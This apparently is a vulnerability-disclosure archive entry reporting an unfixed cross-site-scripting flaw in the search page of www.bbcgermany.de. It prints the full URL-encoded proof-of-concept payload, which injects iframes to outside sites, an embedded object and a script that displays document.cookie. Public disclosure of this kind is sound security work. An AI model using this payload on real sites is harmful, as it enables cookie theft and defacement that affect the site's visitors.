Security researcher hackebeil, has submitted on 07/11/2010 a cross-site-scripting (XSS) vulnerability affecting www.bbcgermany.de, which at the time of submission ranked 613193 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 07/11/2010 |
Date published: 11/12/2011 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: hackebeil |
Domain: www.bbcgermany.de |
Category: XSS |
Pagerank: 613193 |
|---|
URL: http://www.bbcgermany.de/GERMANY/suche/search.php?q=%22%3E%3Cimg%20src%3Dhttp%3A%2F%2Fimg225.imagesh
ack.us%2Fimg225%2F4465%2Fzombie2t.jpg%20%2F%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fxssed.com%3E%3C%2Fifram
e%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fhackebeil.blogspot.com%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28docum
ent.cookie%29%3C%2Fscript%3E%3Cobject%20width%3D640%20height%3D385%3E%3Cparam%20name%3Dmovie%20value
%3Dhttp%3A%2F%2Fwww.youtube.com%2Fv%2Fys6pUis-Wfw%3Ffs%3D1%26amp%3Bhl%3Dde_DE%3E%3C%2Fparam%3E%3Cpar
am%20name%3DallowFullScreen%20value%3Dtrue%3E%3C%2Fparam%3E%3Cparam%20name%3Dallowscriptaccess%20val
ue%3Dalways%3E%3C%2Fparam%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.youtube.com%2Fv%2Fys6pUis-Wfw%3Ffs%3D1
%26amp%3Bhl%3Dde_DE%20type%3Dapplication%2Fx-shockwave-flash%20allowscriptaccess%3Dalways%20allowful
lscreen%3Dtrue%20width%3D640%20height%3D385%3E%3C%2Fembed%3E%3C%2Fobject%3E%3Cbr%3E%3Ca%20href%3Dhtt
p%3A%2F%2Fhackebeil.blogspot.com%3Ehackebeil.blogspot.com%3C%2Fa%3E |
|
Click here to view the mirror
|
|
|
| 
